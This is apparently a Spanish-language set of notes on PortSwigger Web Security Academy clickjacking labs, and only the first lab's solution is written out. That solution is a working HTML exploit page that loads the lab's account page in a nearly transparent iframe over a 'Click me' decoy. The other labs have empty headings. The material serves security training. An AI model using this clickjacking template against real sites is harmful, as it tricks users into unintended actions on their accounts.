Clickjacking
Lab: Basic clickjacking with CSRF token protection
Enunciado
Resolución
<html>
<head>
<style type="text/css">
#targetWebsite {
position:relative;
width:700px;
height:700px;
opacity:0.0001;
z-index:2;
}
#decoyWebsite {
position:absolute;
top:495px;
left:60px;
z-index:1;
}
</style>
</head>
<body>
<div id="decoyWebsite">Click me</div>
<iframe id="targetWebsite" src="https://0aae00b0048a89418005035e00c30052.web-security-academy.net/my-account"></iframe>
</body>
</html>


Lab: Clickjacking with form input data prefilled from a URL parameter
Enunciado
Resolución





Lab: Clickjacking with a frame buster script
Enunciado
Resolución



Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS
Enunciado
Resolución




Lab: Multistep clickjacking
Enunciado
Resolución

Last updated